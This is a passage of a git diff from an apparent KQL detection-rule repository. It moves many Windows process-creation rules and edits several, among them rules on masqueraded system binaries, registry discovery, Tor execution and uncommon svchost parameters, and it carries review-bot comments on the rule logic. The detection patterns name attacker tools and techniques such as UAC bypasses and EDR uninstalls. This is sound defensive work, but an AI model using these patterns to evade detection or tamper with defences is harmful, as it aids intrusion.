FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\"))
\ No newline at end of file
+| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\werfaultsecure.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql
similarity index 55%
rename from KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
rename to KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql
index cd3d4b91..e060abbd 100644
--- a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
+++ b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql
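Review bot: The per-user WSL exclusion on the new `| where` line tests `FolderPath startswith "C:\\Users\\'"`, and the stray apostrophe after `Users\\` means no real path can satisfy it, so wsl.exe launched from a user's WindowsApps folder is never allow-listed and will alert; the literal should read `FolderPath startswith "C:\\Users\\"`. The defect is present on the removed line as well and looks like a quoting artefact of the Sigma-to-KQL conversion, so the converter may be reproducing it in other rules that use a `C:\Users\` prefix. The two entries added in this commit, `\\werfault.exe` and `\\werfaultsecure.exe`, are already covered by the `C:\\Windows\\System32\\` and `C:\\Windows\\SysWOW64\\` exclusions and need nothing further. The rule header lies outside the hunk.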
@@ -9,4 +9,4 @@
 // - Unlikely
 DeviceProcessEvents
-| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks")
\ No newline at end of file
+| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql
rename to KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql
diff --git a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql
rename to KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql
diff --git a/KQL/rules/Exfiltration/tap_installer_execution.kql b/KQL/rules/windows/process_creation/tap_installer_execution.kql
similarity index 100%
rename from KQL/rules/Exfiltration/tap_installer_execution.kql
rename to KQL/rules/windows/process_creation/tap_installer_execution.kql
diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
rename to KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql
diff --git a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql b/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/taskmgr_as_local_system.kql
rename to KQL/rules/windows/process_creation/taskmgr_as_local_system.kql
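Review bot: The two registry paths dropped from the selection on the new `| where` line, `\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces` and `\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks`, are still matched only because the `contains` checks on their parent keys `\\SYSTEM\\CurrentControlSet\\Services` and `\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion` remain, and nothing in the rule records that dependency, so a later change of those parent checks to a tighter operator would silently lose the sub-keys. A header comment such as `// Note: Tcpip\Parameters\Interfaces and TaskCache\Tasks are covered through their parent keys (contains)` would preserve the intent. The `ProcessCommandLine contains "gpv"` branch is a bare substring test and fires on any PowerShell command line containing those three letters, for example inside a path; if that proves noisy, `ProcessCommandLine matches regex @"(?i)\bgpv\b"` is the tighter form. The rule header lies outside the hunk.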
diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/windows/process_creation/tasks_folder_evasion.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/tasks_folder_evasion.kql
rename to KQL/rules/windows/process_creation/tasks_folder_evasion.kql
diff --git a/KQL/rules/Initial Access/terminal_service_process_spawn.kql b/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql
similarity index 100%
rename from KQL/rules/Initial Access/terminal_service_process_spawn.kql
rename to KQL/rules/windows/process_creation/terminal_service_process_spawn.kql
diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql b/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql
rename to KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql
diff --git a/KQL/rules/Command and Control/tor_client_browser_execution.kql b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql
similarity index 59%
rename from KQL/rules/Command and Control/tor_client_browser_execution.kql
rename to KQL/rules/windows/process_creation/tor_client_browser_execution.kql
index 48359a1e..f4a77dd9 100644
--- a/KQL/rules/Command and Control/tor_client_browser_execution.kql
+++ b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql
@@ -7,4 +7,4 @@
 // Tags: attack.command-and-control, attack.t1090.003
 DeviceProcessEvents
-| where FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe"
\ No newline at end of file
+| where ProcessVersionInfoFileDescription =~ "Tor Browser" or ProcessVersionInfoProductName =~ "Tor Browser" or (FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe")
\ No newline at end of file
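Review bot: The two `ProcessVersionInfo*` predicates added at the front of the tor_client_browser_execution `| where` line use `=~`, an exact case-insensitive comparison, so they fire only when the PE resource string is precisely `Tor Browser`; those fields come from the binary's own version resource and may be empty for builds shipped without one, so the path branch kept in the trailing parentheses remains the baseline and should not be removed later, which is worth stating in a comment such as `// version-info fields are optional metadata; the path check below is the baseline`. As a point of style, the parentheses around the path branch are redundant under a flat `or`, and putting the three alternatives one per line would make the next addition easier to review. The rule header lies outside the hunk.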
diff --git a/KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql
rename to KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql
rename to KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql
rename to KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql b/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql b/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql
diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql
similarity index 100%
rename from KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql
rename to KQL/rules/windows/process_creation/uac_bypass_using_windows_media_player_process.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql b/KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql
rename to KQL/rules/windows/process_creation/uac_bypass_via_icmluautil.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql
rename to KQL/rules/windows/process_creation/uac_bypass_via_windows_firewall_snap_in_hijack.kql
diff --git a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql b/KQL/rules/windows/process_creation/uac_bypass_wsreset.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uac_bypass_wsreset.kql
rename to KQL/rules/windows/process_creation/uac_bypass_wsreset.kql
diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql
similarity index 100%
rename from KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql
rename to KQL/rules/windows/process_creation/uefi_persistence_via_wpbbin_processcreation.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql
rename to KQL/rules/windows/process_creation/uncommon_addinutil_exe_commandline_execution.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_process_of_addinutil_exe.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_process_of_appvlp_exe.kql
diff --git a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql
similarity index 100%
rename from KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_process_of_bginfo_exe.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_process_of_defaultpack_exe.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_process_of_setres_exe.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_process_spawned_by_odbcconf_exe.kql
diff --git a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql
similarity index 100%
rename from KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_child_processes_of_sndvol_exe.kql
diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql
rename to KQL/rules/windows/process_creation/uncommon_filesystem_load_attempt_by_format_com.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql
rename to KQL/rules/windows/process_creation/uncommon_link_exe_parent_process.kql
diff --git a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql
similarity index 100%
rename from KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql
rename to KQL/rules/windows/process_creation/uncommon_one_time_only_scheduled_task_at_00_00.kql
diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql
rename to KQL/rules/windows/process_creation/uncommon_sigverif_exe_child_process.kql
diff --git a/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql
new file mode 100644
index 00000000..6f0c33dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql
@@ -0,0 +1,13 @@
+// Title: Uncommon Svchost Command Line Parameter
+// Author: Liran Ravich
+// Date: 2025-11-14
+// Level: high
+// Description: Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.
+// This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1036.005, attack.t1055, attack.t1055.012
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\svchost.exe" and (not((ProcessCommandLine =~ "" or ProcessCommandLine matches regex "-k\\s\\w{1,64}(\\s?(-p|-s))?" or isnull(ProcessCommandLine)))) and (not(((ProcessCommandLine contains "svchost.exe" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (ProcessCommandLine =~ "svchost.exe" and InitiatingProcessFolderPath endswith "\\MRT.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql b/KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql
rename to KQL/rules/windows/process_creation/uncommon_svchost_parent_process.kql
diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/uncommon_system_information_discovery_via_wmic_exe.kql
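Review bot: The header of the new uncommon_svchost_command_line_parameter rule is internally inconsistent: `// MITRE Tactic: Defense Evasion` names one tactic while the `// Tags:` line also carries `attack.privilege-escalation`, so tooling that keys on the tactic field and tooling that keys on tags will file the rule differently; either extend it to `// MITRE Tactic: Defense Evasion, Privilege Escalation` or drop the extra tag. On the `| where` line, `matches regex` in KQL is case-sensitive and unanchored, so the `"-k\\s\\w{1,64}(\\s?(-p|-s))?"` exclusion is satisfied wherever such a token appears in the command line rather than only in the canonical `svchost.exe -k <group> [-p|-s]` shape; that is presumably carried over from the Sigma source and is probably deliberate, since legitimate lines commonly continue with further arguments, but a comment on the line recording it, e.g. `// exclusion regex is unanchored on purpose: legitimate lines carry trailing args`, would stop a later reviewer from tightening it and introducing false positives. The `isnull(ProcessCommandLine)` and `=~ ""` branches are fine as written; a single `isempty(ProcessCommandLine)` would express both.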
diff --git a/KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql b/KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql
rename to KQL/rules/windows/process_creation/uncommon_userinit_child_process.kql
diff --git a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql
rename to KQL/rules/windows/process_creation/uninstall_crowdstrike_falcon_sensor.kql
diff --git a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql b/KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql
rename to KQL/rules/windows/process_creation/uninstall_sysinternals_sysmon.kql
diff --git a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql b/KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql
rename to KQL/rules/windows/process_creation/unmount_share_via_net_exe.kql
diff --git a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql
similarity index 100%
rename from KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql
rename to KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql
diff --git a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql b/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql
rename to KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql
diff --git a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql
similarity index 100%
rename from KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql
rename to KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql
diff --git a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql
similarity index 100%
rename from KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql
rename to KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql
diff --git a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql
rename to KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql
diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql
rename to KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql
diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql
rename to KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql
diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql
similarity index 100%
rename from KQL/rules/Execution/use_of_fsharp_interpreters.kql
rename to KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql
diff --git a/KQL/rules/Execution/use_of_openconsole.kql b/KQL/rules/windows/process_creation/use_of_openconsole.kql
similarity index 100%
rename from KQL/rules/Execution/use_of_openconsole.kql
rename to KQL/rules/windows/process_creation/use_of_openconsole.kql
diff --git a/KQL/rules/Execution/use_of_pcalua_for_execution.kql b/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql
similarity index 100%
rename from KQL/rules/Execution/use_of_pcalua_for_execution.kql
rename to KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql
diff --git a/KQL/rules/Defense Evasion/use_of_remote_exe.kql b/KQL/rules/windows/process_creation/use_of_remote_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_remote_exe.kql
